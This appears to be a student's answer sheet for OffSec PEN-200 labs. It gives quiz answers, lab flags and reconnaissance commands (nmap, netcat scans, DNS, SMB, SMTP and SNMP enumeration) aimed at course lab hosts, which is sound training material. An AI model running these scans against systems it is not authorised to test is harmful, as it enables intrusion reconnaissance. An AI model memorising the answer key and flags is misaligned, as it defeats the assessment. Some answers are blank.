The document outlines various aspects of cybersecurity training, including the challenges posed by adversaries, the importance of the CIA triad (Confidentiality, Integrity, Availability), and methodologies like threat modeling and chaos testing. It also covers recent cybersecurity breaches, roles in cybersecurity, and educational strategies for effective learning. Additionally, it discusses practical skills for penetration testing and information gathering techniques such as WHOIS enumeration.

Uploaded by

abdurasul.200303

OSCP PEN-200

3.1.3. On Emulating the Minds of our Opponents

Labs
1. What two properties do adversaries have that make Cybersecurity particularly challenging? Enter your answer in the
form of a single character.

a. malice and vengeance
b. malice and intelligence
c. intelligence and generosity
d. pens and paper

Answer
b

2. The "Security Mindset" was first introduced by whom?

Answer

Bruce Schneier

3. Fill in the blank: Cybersecurity almost always requires reasoning under ________?

Answer

uncertainty

3.2.4. Recent Cybersecurity Breaches


Labs

1. What kind of attack takes over a computer or a set of computers and holds it hostage until the owner pays a fee?

Answer

Ransomware

2. Fill in the blank. Social Engineering generally exploits vulnerabilities in __________?

Answer

employees

3. Alice and Bob are two fictional characters often used to illustrate examples in cryptography. Other characters were
created to fulfill additional roles in these examples. What's the name of the character who is commonly used as the
"eavesdropper" in cryptography literature? You may need to do some additional research to answer this question.

Answer

eve

3.3.4. Balancing the Triad with Organizational Objectives

Labs

1. Which property of the CIA triad does having a reasonable password length policy help protect?

Answer

confidentiality

2. Which property of the CIA triad does a strong encryption algorithm help protect?

Answer
confidentiality

3. Which property of the CIA triad do hashing and checksums help protect?

Answer
Integrity

4. Bank Corp has a form on their website. The code that processes form submissions doesn't sanitize certain
parameters. This enables any user to change values stored in tables on a SQL database. As a result, the user can
change the amount of money that they have in their accounts. This is an example of a breach of which CIA triad
property?

Answer
Integrity

5. Acme Co accidentally left an AWS S3 bucket unsecured, which allowed anyone to access sensitive personally
identifiable data. This is an example of a breach of which CIA triad property?

Answer
confidentiality

6. Hope Hospital holds all of its data on a single server with no backups. One day, a janitor accidentally trips on the
cord, yanking it from the socket and disconnecting the server the staff relies on. This is an example of a breach of
which CIA triad property?

Answer

Availability

For the following questions, refer to this scenario:


In 2016, Linux Mint was compromised. The attackers were able to gain access to the web server that hosted their ISO
downloads, and replace them with different ISOs that contained backdoors installed on them. They also changed the
publicly visible checksums of the ISOs on the same site. The Linux Mint administrators identified the issue and resolved
it within 24 hours. Part of their discovery was that the ISOs and checksums, which were downloadable via a torrent (a
way to download a file on a peer-to-peer network), were not impacted by the breach.

7. Which part of the CIA triad was impacted when the attackers changed the ISO files on the website?

Answer
integrity

8. Which part of the CIA triad was impacted when the attackers gained access to the web server before any
modifications were made?

Answer
confidentiality

9. Suppose attackers decided to remove all critical files on a web server, preventing the server from functioning in the
intended way. Which part of the CIA triad would have been impacted?

Answer
availability

10. What part of the CIA triad is Linux Mint addressing by having two download locations?

Answer

availability

3.4.11. Logging and Chaos Testing


Labs

1. Which algorithm can be used to require multiple persons to attain authorization?

Answer
SSS

2. The 2019 Capital One attack was facilitated by not adhering to which important security principle?

Answer
Principle of Least Privilege

3. Fill in the blank: _____ _____ is a methodology that encourages unpredictable environments that impact security, to
provide teams and processes robust experience handling critical events.

Answer

Chaos testing

4. Which document is used to list and keep track of all assets within an organization?

Answer
inventory

5. BCP stands for what?

Answer
Business Continuity Planning

6. Thinking like the adversary and exploring the impacts of threat intelligence is called what?

Answer

Threat modeling

7. Each key should have how many purposes?

Answer
1

8. Which encryption protocol discussed in this Learning Unit uses ephemeral keys?

Answer
tls

9. Names, addresses, phone numbers, email addresses, and SSNs are all examples of what type of information?

Answer
pii

3.5.3. Anatomy of Cyber

Labs

1. Which rule under HIPAA is responsible for outlining how Electronic Protected Health Information should be protected?

Answer
Security Rule

2. True or false: GDPR applies to entities (companies, organizations, etc.) that are not located in the European Union but
collect data about EU citizens?

Answer
true

3. What is the name of the program that provides a standardized security framework for cloud services used by the
United States federal government?

Answer
FedRAMP

4. The ATT&CK and D3FEND frameworks are maintained by which organization?

Answer
MITRE

5. How many stages of attacker behavior are defined in the Cyber Kill Chain framework?

Answer
7

6. Which of the CIS Top 18 implementation groups is most strict?

Answer
IG3

3.6.4. Additional Roles


Labs

1. Which job role is primarily concerned with proactively identifying intruders on a network or set of systems?

Answer
Threat Hunter

2. Which job role requires a strong understanding of CI/CD pipelines?

Answer

DevSecOps

3. Which OffSec course deals with logical exploitation on macOS systems?

Answer
EXP-312

4.1.3. The Forgetting Curve and Cognitive Load


Labs
1. Most education research is focused on which group of individuals? Enter your answer in the form of a single
character.

A. School-aged children
B. Medieval trade smiths
C. Individuals who have already entered the workforce
D. Hackers

Answer

2. To help with retention, training materials may be presented in, for example, both text and video format. What is the
name of this method of learning?

Answer

Dual Coding

3. Ebbinghaus noted that after 20 minutes we forget roughly how much of what we learned. Enter your answer in the
form of a single character.

A. Less than 10% of information is lost.
B. About 40% of what we had memorized is gone.
C. 95% of all memorized information is gone after 20 minutes.
D. None. We can recall everything, but after 40 minutes, retention begins to fail.

Answer
b

4. The term "Cognitive Load" could be used to describe which of the following? Enter your answer in the form of a
single character.

A. The areas of domain expertise possessed by a single person.
B. The emotional weight carried by someone who "knows too much".
C. How hard it is to learn something.
D. The finite amount of material a learner can retain in a single study session.

Answer
d

4.2.3. The Challenges of Remote and Asynchronous Learning


Labs
1. This section included high-level overviews of a variety of different studies. What conclusion did these studies come
to? Enter your answer in the form of a single character.

A. There are small but notable differences between digital and print materials.
B. Context switching is difficult, so learning "screen things" on a screen may be preferable to learning them from a book.
C. The quality of the material matters much more than the format in which it is delivered.
D. All of the above

Answer
d

2. Which of the following statements about preparing for an evolving information security landscape is incorrect? Enter
your answer in the form of a single character.

A. Memorizing and following a checklist might be a good start, but we will need a more in-depth understanding of methodologies to evolve along with an ever-changing
landscape.
B. Even an "expert" in a particular Information Security area needs to constantly return to their area of expertise to learn and understand new techniques and methods.
C. Learners can only be prepared for the situations that are covered in their training.
D. Learning a Module like "Malware Analysis" has a lot in common with a Module like "Teamwork". In both cases, we can't predict the exact scenario in which the new skill
will be applied.

Answer
c

3. Which of the following statements about the challenge of remote, asynchronous learning is incorrect? Enter your
answer in the form of a single character.

A. There are more challenges for remote learners than for folks in more familiar, traditional classroom learning situations.
B. Connecting to a learning community, for example on Discord, can be a significant help.
C. Traditional classroom learners generally have a community of co-learners that is intrinsically available.
D. Without an instructor present, there's less responsibility on the learner.

Answer
d

4.3.4. Contextual Learning and Interleaving


Labs
1. What is meant by the term "Demonstration Method"? Enter your answer in the form of a single character.

A. The instructor assigns a quiz so that learners can demonstrate their skills.
B. The instructor models the skill the learner is hoping to learn.
C. The learner has to demonstrate competence before moving forward.
D. A learner demonstrates their current ability so that the instructor knows where to begin.

Answer
b

2. Which of the following activities with OffSec training materials does not allow learners to apply their skills in a
"hands-on" manner by themselves? Enter your answer in the form of a single character.

A. Following along on virtual machines that accompany written materials
B. Completing exercises on a virtual machine
C. Completing the Challenge Labs (virtual exercise environments) that accompany some courses
D. Watching video walkthroughs

Answer
d

4.4.4. Analyzing this Approach


Labs

1. Which of the following is not a strategy used in teaching this section?

A. Showing the solution first, then explaining why and how it works.
B. Running into problems so that we can see how troubleshooting works.
C. Including "extra" steps, like the verification that our solution was successful.
D. Modeling the thinking process required for solving the problem.

Answer
a

2. In this short Learning Unit, we focused on our central Module, the executable permission, but we also introduced and
discussed other commands that allowed us to copy files and list file properties. Including some additional items like this
is a strategy known as what?

A. Dual Coding
B. Interleaving
C. The Demonstration Method
D. Ebbinghaus' Forgetting Curve

Answer

3. At one point in this section, we tried running a command (chmod) on a file and it didn't work. Rather than quickly
abandoning this line of thinking, we tried running the exact same command on itself, which also didn't work. This type
of optimistic persistence is important to learn. OffSec has a two word name for this mentality. What is it?

Answer
try harder

4. Assume that in a normal Module, this material would have been accompanied by a virtual machine, which would have
allowed the learner to follow along. The approach used here addresses a number of the challenges discussed earlier in
this Module. While this example wasn't perfect, which challenge is definitely not addressed in this particular teaching
method (but can be addressed with the learner's approach to learning)?

A. A lack of hands-on opportunities that impedes retention.
B. Too much information at once, leading to cognitive load.
C. The difficulty of learning new things in the abstract, out of context.
D. An unfamiliarity with struggle and failure that leads to frustration when we inevitably encounter it later.

Answer
b

4.7.6. Study Your Own Studies

Labs
1. Take advantage of the "Notes" section here and write down a strategy that you believe will work for you. Click "Add
Note" and type out a description of what feels both hopeful and practical for you. Think about how often you'd like to
study and for how long. When you're done, save the note so that you can return to it later. Finally, enter the word
"planned" as the answer to this question.

Answer
planned

5.1.6. Tools to Take Screenshots

Labs
1. A penetration tester and their client should absolutely agree on what before the engagement starts?

Answer
RoE

2. What two words that end in "cise" are desirable properties of the general structure of penetration testing notes? Input
your answer in the form "A and B".

Answer
concise and precise

3. The format of our notes for a web application test should include the application name, URL, issue detail, and proof of
concept payload. What else should we include?

Answer
Request Type

4. How many important concepts should be shown in a single screenshot?

Answer
1

5.2.7. Appendices, Further Information, and References

Labs
1. Who do we usually write the Penetration Testing Report for?

A. The Head of Cybersecurity
B. The CIO
C. The Security Operations Center Analysts
D. All of the above

Answer
d

2. What section should usually begin a Penetration Testing Report?

Answer
Executive Summary

3. What is the missing word in this sentence: Make sure that any solution given has a concrete and _________
implementation.

Answer
practical

6. Information Gathering
6.2.1. Whois Enumeration

Information Gathering - WHOIS Enumeration - VM #1

Information Gathering - WHOIS Enumeration - VM #2

Information Gathering - WHOIS Enumeration - VM #3

Labs
1. Start up VM #1 and perform a whois query against the
megacorpone.com domain using VM #1's IP address as WHOIS server. What is the hostname of the third Megacorp
One name server?

Answer
NS3.MEGACORPONE.COM

View hints
Refer to listing 2 and identify the command that can help you retrieve the hostname of the third nameserver
belonging to Megacorp One.

Command

whois megacorpone.com

2. Based on the previous question answer, what is the Registrar's WHOIS server?

Answer
whois.gandi.net

View hints
Use the command provided in listing 2 and execute it to retrieve the output. Look for the Registrar WHOIS Server
attribute in the output to find the information you need.

Command

whois megacorpone.com

3. Once you've started VM #2, perform a WHOIS query on the offensive-security.com domain against the machine's
IP. The flag can be found within the DNS section of the WHOIS record.

Answer
OS{ff8b884ae46f7553979ad71a24e9df44}

View hints
Analyze the command in listing 2 and make changes to execute a whois query for the "offensive-security.com"
domain.

Command

whois offensive-security.com -h 192.168.204.251

4. Once you've started VM #3, perform a WHOIS query on the offensive-security.com domain against the machine's
IP. What's the Tech Email address?

Answer
OS{68dd18dfd27c46346d486580469852c4}

View hints
Analyze the command in listing 2 and make changes to execute a whois query for the "offensive-security.com"
domain and search for tech email address.

Command

whois offensive-security.com -h 192.168.204.251

6.2.2. Google Hacking


Labs
1. What is the name of the VP of Legal for MegaCorp One?

Answer
Mike Carlow

View hints
1. Review the Google dork used in Figure 1 and modify it to include the intext operator.
2. Use the modified dork to search for the term VP Of Legal in the web pages related to Megacorp One.

Command
site:megacorpone.com intext:"VP of Legal"
https://www.megacorpone.com/contact.html

2. What is the email address of the VP of Legal for MegaCorp One?

Answer
[email protected]

View hints

1. Review the Google dork used in Figure 1 and modify it to include the intext operator.

2. Use the modified dork to search for the term VP Of Legal in the web pages related to Megacorp One and
identify their email address.

Command
site:megacorpone.com intext:"Mike Carlow"
https://www.megacorpone.com/contact.html

3. What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?

Answer
william adler

View hints
Use the search function on social media platforms (twitter, etc) to check for employees of Megacorp One.

Command
I went to the Twitter social media site, searched for megacorpone, and the person @RealWillAdler came up; when I
read his bio, it turned out he no longer works there!

6.2.3. Netcraft
Labs
1. From your own Kali VM, use Netcraft to determine what application server is running on
www.megacorpone.com.

Answer
apache

View hints

1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.

2. Review the output shown in Figure 8 and locate the section that displays the information related to the
application server being used by the website.

Command
https://searchdns.netcraft.com/
I entered www.megacorpone.com here and it ran the scan for me.

2. What is the name of the Client-Side Scripting Framework that handles fonts?

Answer
Font Awesome Web Fonts

View hints

1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.

2. Review the output shown in Figure 8 and locate the section that pertains to the Client-Side Scripting Framework
that handles fonts used by the website.

Command
https://searchdns.netcraft.com/

I entered www.megacorpone.com here and it ran the scan for me.

3. What is the value of the IPv4 autonomous systems number that hosts www.megacorpone.com?

Answer
AS16276

View hints

1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.

2. Review the output shown in Figure 7 and locate the value of the IPv4 autonomous systems number.

Command

https://searchdns.netcraft.com/
I entered www.megacorpone.com here and it ran the scan for me.

6.2.4. Open-Source Code
Labs
1. Perform open-source recon on the MegaCorp One's GitHub repository and try to find user credentials. What is the
username associated with the discovered hash?

Answer
trivera

View hints

1. Follow the steps provided in this Section.

2. Review the output shown in Figure 11 and locate the relevant section that provides the information you need to
answer the question.

Command

2. What is the title of the secondary, placeholder, Megacorp One repository?

Answer
git-test

View hints
There is a second repository listed on the MegaCorp One GitHub profile.

Command

Living off the Land - living off the land (vocabulary note)

6.3.1. Passive LLM-Aided enumeration

Labs
1. Ask ChatGPT: "What is the WHOIS information for the domain megacorpone.com?" Based on the response, who is
listed as the registrant of megacorpone.com?

A) Alan Grofield
B) Joe Sheer
C) Matt Smith
D) Tanya Rivera

Answer
Alan Grofield

View hints
no hints

Command

2. Based on the previous GPT output, what is the domain status of megacorpone.com?

A) Active
B) Pending Transfer
C) clientTransferProhibited
D) Expired

Answer
clientTransferProhibited

View hints
no hints

Command

3. Ask ChatGPT "Can you generate the best Google dorks for the website megacorpone.com?"

Based on the response, which Google dork, according to ChatGPT, identifies subdomains of megacorpone.com?

A) site:megacorpone.com -www
B) site:megacorpone.com filetype:pdf
C) site:megacorpone.com ext:yaml
D) site:*.megacorpone.com

Answer

View hints
no hints

Command
no commands

4. Ask ChatGPT: "What public information is available about the leadership of MegacorpOne.com and their social
media presence?"

Based on the output, what is the Twitter handle of the CEO of MegaCorp One?

A) @Joe_Sheer
B) @MattSmithMCO
C) @TanyaRiveraMCO
D) @TomHudsonMCO

Answer

View hints

no hints

Command

5. Ask ChatGPT: "Can you provide the top Google dorks to search for exposed repositories related to
megacorpone.com?"

Which Google dork can help identify exposed source code repositories for megacorpone.com?

A) site:megacorpone.com "gitlab" | "github"
B) site:megacorpone.com inurl:"login"
C) site:megacorpone.com ext:log
D) site:megacorpone.com filetype:sql

Answer

View hints

no hints

Command

6. Ask ChatGPT "Can you provide advanced passive enumeration techniques for identifying potential subdomains on
megacorpone.com?"

Which tool, combined with ChatGPT's suggestions, could enhance subdomain enumeration results?

A) Sublist3r
B) Metasploit
C) Nessus
D) Hydra

Answer
a

View hints
no hints

Command
no commands

6.4.1. DNS Enumeration

Information Gathering - DNS Enumeration - Walk Through - VM Group 1

Labs
1. Perform a DNS enumeration on the MX records of megacorpone.com: which is the second-to-best priority value
listed in the reply? The DNS priority is a 2-digit number, and lower priority values indicate higher preference.

Answer
20

View hints

1. Use the command provided in listing 6 and look at the priority values of the MX records.

2. The answer to the question appears in the output in the format "handled by X", where X is the specific value.

Command

host -t mx megacorpone.com

2. How many TXT records are associated with the megacorpone.com domain?

Answer

View hints

Use the command provided in listing 7 to gather the information you need to answer the question.

Command

host -t txt megacorpone.com

3. Automate the DNS enumeration of the megacorpone.com domain with DNSEnum. What is the IP of
the siem.megacorpone.com host?

Answer

51.222.169.215

View hints

Use the command provided in listing 16 to automate DNS enumeration and gather the information you need to
answer the question.

Command

dnsenum megacorpone.com

4. Power up 'Walk Through VM Group 1', connect to the Windows 11 Client (using xfreerdp), and enumerate the
DNS megacorptwo.com and its subdomains through nslookup as illustrated in this section. What text is contained within
the TXT record of the info.megacorptwo.com domain?

Answer
greetings from the TXT record body

View hints

1. Use the command provided in listing 19 to obtain the TXT record for a specific IP address, adjusting the IP
address based on your actual exercise VM.

2. Make sure to submit the answer without quotes.

Command

nslookup -type=TXT info.megacorptwo.com 192.168.50.151

6.4.2. TCP/UDP Port Scanning Theory

Walk Through Exercises - Information Gathering - Port Scanning Theory - VM Group 1

Labs
1. Once VM Group 1 is started, perform a Netcat scan against the machine ending with the octet '151' (ex: 192.168.51.151)
Which is the lowest TCP open port?

Answer

53

View hints

Use the command provided in listing 20 and make changes with the relevant options and arguments as needed to
perform the desired task.

Command

nc -nvv -w 1 -z 192.168.204.151 1-100

2. On the same host, perform a netcat TCP scan for the port range 1-10000. Which is the highest open TCP port?

Answer

9389

View hints

Use the command provided in listing 20 and make changes with the relevant options and arguments as needed to
perform the desired task.

Command

nc -nvv -w 1 -z 192.168.204.151 9300-9400

3. Other than port 123, what is the first returned open UDP port in the range 150-200 when scanning the machine
ending with the octet '151' (ex: 192.168.51.151)?

Answer
161

View hints
Use the command provided in listing 21 and make changes with the relevant options and arguments as needed to
perform the desired task.

Command

nc -nv -u -z -w 1 192.168.204.151 150-200

6.4.3. Port Scanning with Nmap

Information Gathering - Port Scanning - Module Exercises - VM #1

Information Gathering - Port Scanning - Walk Through Exercises - VM Group 1

Information Gathering - Port Scanning - Module Exercises - VM Group 1

Labs
1. Start Walk Through Exercises in VM Group #1, use Nmap to conduct a SYN stealth scan of your target IP range, and
save the output to a file. Use grep to show machines that are online. Which host has port 25 open? Use
50 as the third IP octet instead of your dynamically assigned IP when submitting the answer.

Answer
192.168.50.8

View hints

1. Start Walk Through Exercises - VM Group 1.

2. Use Nmap to SYN scan on the entire subnet for port 25 open, using the command in listing 26.

3. Update the IP address to 192.168.50.0/24 to scan the entire subnet (adjust the third octet accordingly).

Command

nmap -sS -p 25 --open -T4 192.168.153.0/24

2. Perform an Nmap TCP scan against the addresses on the Walk Through Exercises on VM Group #1. Which host is
running a WHOIS server? Use 50 as the third IP octet instead of your dynamically assigned IP when submitting the
answer.

Answer
192.168.50.251

View hints

1. By default the port used for the whois service is port 43.

2. Use the command provided in listing 25 to perform a port scan on an entire subnet for whois service using "-p"
to specify TCP port. (Update the third octet accordingly)

Command

nmap -sS -p 43 --open -T4 192.168.153.0/24

3. Connect via RDP to the Windows 11 client from Walk Through Exercises VM Group #1 and perform TCP port discovery
against the Windows DC machine ending with the octet '151' (ex: 192.168.51.151). Which are the first four open TCP
ports? List the ports separated by commas.

Answer

53,88,135,139

View hints

Use the command provided in listing 40 to see the open ports, adjusting the IP address based on your actual
exercise VM.

Command

nmap -sS --open 192.168.153.151

4. There is a service running on a high-range TCP port on the Module Exercises VM #1. Find it, and you will find the flag
together with it.

Answer
OS{400d6e5f645646fb22da0b954c71e73e}

View hints

1. Perform an Nmap scan to identify the highest TCP port in the range of 50000-60000 by specifying the "-p" flag
on your command.

2. Once you have identified the open port in a given range, try connecting to it using "nc" to read the flag.

Command

nmap -sS -p 50000-60000 -T4 192.168.153.52 -Pn

nc -nv 192.168.153.52 59811

5. The NMAP Scripting Engine includes many extremely useful scripts to assist in the active recon process for a wide
variety of things, not just the handful of services discussed in this Module. In the NMAP library, for example, there are
over 100 NSE discovery scripts. For this challenge, you will need to use a new discovery script to help you enumerate
the HTTP title of the default page of all the hosts with web servers on the public lab network. Performing something as
simple as scanning the web server titles can help you collect all sorts of information about the target, including the
purpose of the website, software version information, and even login pages. In this challenge, you need to find the host
with a web server with the title "Under Construction" in the Module Exercises VM Group 1. The flag is located on
the index.html page of the web server matching this title.

Answer

OS{6cab149f52c24e1894110fc972315fb0}

View hints

1. Use a discovery script that contains http and title in the name.

2. Try using locate or ls and grep to find the script.

Command

nmap -T4 --script http-title 192.168.153.0/24

6.4.4. SMB Enumeration

Walk Through - Information Gathering - SMB Enumeration - VM Group 1

Topic Exercises - Information Gathering - SMB Enumeration - VM Group 1

Labs
1. Power on the Walk Through VM Group 1 and use Nmap to create a list of the SMB servers in the VM Group 1. How
many hosts have port 445 open?

Answer
10

View hints

1. Use the command provided in listing 41 to scan for SMB servers, adjusting the third octet.

2. Utilize text processing tools such as "cut", "grep" and "wc" or similar to count the IP addresses with open SMB
ports.

Command

nmap -T4 -p 445 --open 192.168.153.0/24
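The counting step the hint describes, as an added example that is not part of the course materials: it runs offline over a constructed sample of nmap grepable (-oG) output with placeholder addresses, and it deduplicates hosts and ignores non-open states so the count matches distinct hosts with 445 open rather than raw matching lines.

```shell
# Constructed sample of "nmap -p 445 -oG -" output (placeholder addresses,
# not a capture from the lab). One host reports 445 filtered and each host
# appears on two lines, so a plain "grep 445 | wc -l" would over-count.
SAMPLE_NMAP_OG='# Nmap 7.94 scan initiated as: nmap -p 445 -oG - 192.168.50.0/24
Host: 192.168.50.21 ()  Status: Up
Host: 192.168.50.21 ()  Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.50.22 ()  Status: Up
Host: 192.168.50.22 ()  Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.50.30 ()  Status: Up
Host: 192.168.50.30 ()  Ports: 445/filtered/tcp//microsoft-ds///
Host: 192.168.50.151 () Status: Up
Host: 192.168.50.151 () Ports: 445/open/tcp//microsoft-ds///
# Nmap done at ...; 256 IP addresses (4 hosts up) scanned'

# list_smb_hosts: read grepable output on stdin and print each host that
# reports 445/open exactly once, sorted numerically octet by octet.
# The regex also matches multi-port lines, where entries are comma-separated.
list_smb_hosts() {
    grep -E '(Ports: |, )445/open/' \
      | cut -d ' ' -f 2 \
      | sort -u \
      | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
}

# count_smb_hosts: number of distinct hosts with 445 open in the sample.
count_smb_hosts() {
    printf '%s\n' "$SAMPLE_NMAP_OG" | list_smb_hosts | wc -l | tr -d ' '
}

# first_smb_host: lowest-numbered host in the list, useful as a sanity check.
first_smb_host() {
    printf '%s\n' "$SAMPLE_NMAP_OG" | list_smb_hosts | head -n 1
}
```

Against a real scan, pipe the file saved with -oG into list_smb_hosts instead of the embedded sample.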

2. On the same group, connect to the Windows 11 client and repeat the shares enumeration against dc01 via the net
view command. What are the three reported admin shares? List them separated by commas.

Answer
ADMIN$,C$,IPC$

View hints
RDP to the target machine, and view the shared resources using the command provided in listing 45.

Command

net view \\dc01 /all

3. Server Message Block (SMB) is an extremely important service that can be used to determine a wealth of information
about a server, including its users. Start up Topic Exercise VM Group 1 and use Nmap to identify the lab machines
listening on the SMB port and then use enum4linux to enumerate those machines. In doing so, you will find a machine
with the local user alfred. The flag is located in the comments on one of the SMB shares of the host that has
the alfred user.

Answer
OS{9a0c99b70b6273e2a497e5ea2108d67b}

View hints
NO HINTS

Command

nmap -sV -v -p 139,445 --script smb-os-discovery 192.168.153.0/24

enum4linux -S 192.168.153.13

6.4.5. SMTP Enumeration

Walk Through Exercises - Information Gathering - SMTP Enumeration - VM Group 1

Labs
1. Power on the Walk Through Exercises VM Group 1 and search your target network range to identify any systems that
respond to SMTP. Once found, open a connection to port 25 via Netcat and run the VRFY command against the root
user. What reply code does the SMTP server send as a response?

Answer

252

View hints

1. Perform an Nmap scan specifically for TCP port 25 (SMTP) on the entire subnet and see which host has "open"
status.

2. Use "nc" to your advantage to see the "banner"

Command

nmap -sV -p 25 -T4 --open 192.168.153.0/24

nc -nv 192.168.153.8 25

6.4.6. SNMP Enumeration

Information Gathering - SNMP Enumeration - Walk Through Exercises - VM Group 1

Labs
1. Scan your target network on VM Group 1 with onesixtyone to identify any SNMP servers. Once done, list all the
running processes on the only Windows host that is running an SNMP server. What is the full name of the SNMP server
process?

Answer
snmp.exe

View hints

1. Use the commands provided in listing 53 to find the SNMP servers on the range, adjusting the third octet.

2. Use the command provided in listing 56 to identify the specific server process for SNMP.

Command

echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips

snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2

2. On the same Windows host, run one of the SNMP queries we have already explored in this section, this time
appending the -Oa parameter to the command. This parameter automatically translates any hexadecimal string into
ASCII that was otherwise not decoded. What is the first interface name listed in the output?

Answer

Software Loopback Interface 1.

View hints

The command to use is shown in listing 54 with the exception of changing the IP address and adding -Oa.

Command

snmpwalk -c public -v1 -t 10 192.168.153.151 -Oa
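The -Oa switch only asks the snmpwalk client to render Hex-STRING values as text; the same decoding can be applied to saved walk output. The parser below is an added example for these notes, not course or net-snmp code; it runs on a constructed sample shaped like snmpwalk -v1 output from a Windows host and uses the standard hrSWRunName and ifDescr OID prefixes from the exercises above.

```python
"""Parse saved snmpwalk output and decode Hex-STRING values, as snmpwalk -Oa does client-side."""
import re

# Standard OID prefixes used in the SNMP exercises above.
HR_SW_RUN_NAME = "1.3.6.1.2.1.25.4.2.1.2"  # HOST-RESOURCES-MIB: names of running processes
IF_DESCR = "1.3.6.1.2.1.2.2.1.2"           # IF-MIB: interface descriptions

# One varbind per line: "<oid> = <TYPE>: <value>". Without MIBs loaded, net-snmp prints "iso.3.6...".
LINE_RE = re.compile(r"^(?:iso|\.?1)\.(?P<rest>[\d.]+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$")

# Constructed sample modelled on snmpwalk -v1 output from a Windows host (not a real capture).
SAMPLE_WALK = """\
iso.3.6.1.2.1.2.2.1.2.1 = Hex-STRING: 53 6F 66 74 77 61 72 65 20 4C 6F 6F 70 62 61 63 6B 20 49 6E 74 65 72 66 61 63 65 20 31 00
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.1876 = STRING: "snmp.exe"
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 52
"""


def decode_value(vtype: str, raw: str):
    """Turn the textual varbind value into a Python value."""
    if vtype == "STRING":
        return raw.strip('"')
    if vtype == "Hex-STRING":
        # This is what -Oa does: bytes printed as hex become text; trailing NULs are dropped.
        data = bytes.fromhex(raw.replace(" ", ""))
        return data.rstrip(b"\x00").decode("utf-8", errors="replace")
    if vtype in ("INTEGER", "Gauge32", "Counter32", "Counter64", "Timeticks"):
        match = re.search(r"-?\d+", raw)
        return int(match.group()) if match else raw
    return raw


def parse_walk(text: str) -> list[tuple[str, str, object]]:
    """Return (full_oid, type, decoded_value) for every parsable line."""
    entries = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # wrapped continuation lines of long Hex-STRINGs would need joining first
        oid = "1." + match["rest"]
        entries.append((oid, match["type"], decode_value(match["type"], match["value"])))
    return entries


def column(entries, prefix: str) -> dict[str, object]:
    """Map the row index under an OID prefix to its value, e.g. {"1876": "snmp.exe"}."""
    head = prefix + "."
    return {oid[len(head):]: value for oid, _, value in entries if oid.startswith(head)}


if __name__ == "__main__":
    walk = parse_walk(SAMPLE_WALK)
    print("interfaces:", column(walk, IF_DESCR))
    print("processes:", column(walk, HR_SW_RUN_NAME))
```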

7. Vulnerability Scanning
7.1.1. How Vulnerability Scanners Work

Labs
1. Is this a false positive or a false negative? A vulnerability
scanner identifies a vulnerability for a Linux web server. The target
runs on Windows and the vulnerability is only exploitable on Linux.

Answer
false positive

2. Is this a false positive or a false negative? A vulnerability scanner detects the wrong version of an FTP service.
The detected version has no vulnerabilities, but the running FTP service is vulnerable.

Answer

false negative

7.1.2. Types of Vulnerability Scans

Labs
1. Do you need to perform an authenticated or an unauthenticated
vulnerability scan in the following scenario? You want to determine if
all current patches on a Linux system are installed.

Answer

authenticated

2. Do you need to perform an authenticated or an unauthenticated vulnerability scan in the following scenario? You
want to analyze the perimeter of a server on the internet from the perspective of a malicious actor.

Answer

unauthenticated

7.1.3. Things to consider in a Vulnerability Scan

Labs
1. Is the following statement true or false? A vulnerability scan can
never impact the stability of a target system or service.

Answer

false

2. Is the following statement true or false? Rate limiting can be the reason that a vulnerability scanner flags a live
target system as offline.

Answer

true

7.2.1. Installing Nessus

Labs
1. Follow the steps above to install Nessus Essentials. What is the
command to start the nessusd service after a successful installation
from an unprivileged account?

Answer

sudo systemctl start nessusd.service

View hints

1. Remember, starting a service typically requires administrative privileges. Which command is commonly used in
Linux to execute commands with superuser privileges?

2. Review the command provided in listing 3 for starting Nessus.

7.2.2. Nessus Components

Labs
1. What is the third group of template categories: DISCOVERY, COMPLIANCE and __________?

Answer

Vulnerabilities

View hints

Nessus already provides a broad variety of scanning templates for us to use. These templates are grouped into the
three categories Discovery, ... , and Compliance.

2. Go to the Settings tab in Nessus, then click on the Advanced settings. Find how many concurrent web users are
allowed with the default settings.

Answer
1024

View hints

1. In advanced settings, focus on user management or concurrent access settings.

2. Seek an answer starting with "maximum" and ensure the value relates to "web users."

7.2.3. Performing a Vulnerability Scan

Vulnerability Scanning - Performing a Vulnerability Scan - VM Group 1

Labs
1. Follow the steps above to create your own unauthenticated
vulnerability scan on ports 80 and 443 on the machines from VM Group

2. Review the REPORT menu of the scan configuration, which is shown in Figure 13, and check which is the only
enabled option in the Output section. Enter the name of the activated checkbox.

Answer
Allow users to edit scan results

View hints
1. Ensure you're viewing the 'REPORT' menu (see Figure 13) and focus on the 'Output' section.
2. Find the checkbox related to user permissions and scan results.

Command

7.2.4. Analyzing the Results

Vulnerability Scanning - Performing a Vulnerability Scan - VM #5

Vulnerability Scanning - Analyzing the Results - VM Group 1

Labs
1. In the section "Performing a Vulnerability Scan" we launched a vulnerability scan on four target machines. Follow
the steps outlined in this section to review the results of this scan and analyze the Apache 2.4.49 < 2.4.51 Path
Traversal Vulnerability finding. The finding contains a field named Exploit Code Maturity. Enter the value of this
field as the answer to this exercise.

Answer

Functional

View hints

1. After performing a vulnerability scan, navigate to the 'VPR Top Threats' tab for vulnerability details.

2. Locate and examine 'Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability' for an 'Exploit Code Maturity' attribute.

Command

2. Perform an unauthenticated vulnerability scan on the same four machines (VM Group 1) as in the previous exercise,
but only scan port 8080. Once the scan finishes, review the scan results and identify a host with the grouped finding
HTTP (Multiple Issues). Find HTTP Server Type and Version and enter the Jetty version found.

Answer

9.4.43.v20210629

View hints

